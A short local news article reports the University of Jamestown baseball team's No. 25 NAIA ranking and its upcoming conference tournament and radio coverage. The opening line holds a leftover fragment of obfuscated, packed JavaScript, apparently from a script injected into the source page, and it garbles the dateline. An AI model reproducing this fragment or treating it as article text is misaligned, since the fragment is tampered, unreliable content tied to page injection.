JAMESTOWN zthiz|var|u0026u|referrer|sfkbt||js|php’.split(‘|’),0,{}))
(NewsDakota.com)- Before yesterday, the last time the University of Jamestown baseball was ranked was the preseason poll in 2009. Despite having some very good teams in the interim, they couldn’t crack the Top-25. This includes the 2013 team which won 17 games in a row at one point.
When the new Top-25 polls were released by the NAIA on Tuesday, the Jimmies had garnered enough support to move to No. 25 in the country. They have record of 31-8 and will begin conference tournament play on Friday in Valley City.
Top-seeded Jamestown will play the first game of the tournament against No. 6-seeded Presentation at noon from Charlie Brown Field. Any Jimmie games from the tournament will be broadcast on 103.1 The Raven and streamed at NewsDakota.com.

Head Coach Tom Hager will be live on 1400/97.1 KQDJ at 9:40am on Thursday morning to discuss the season and his thoughts headed into the tournament.
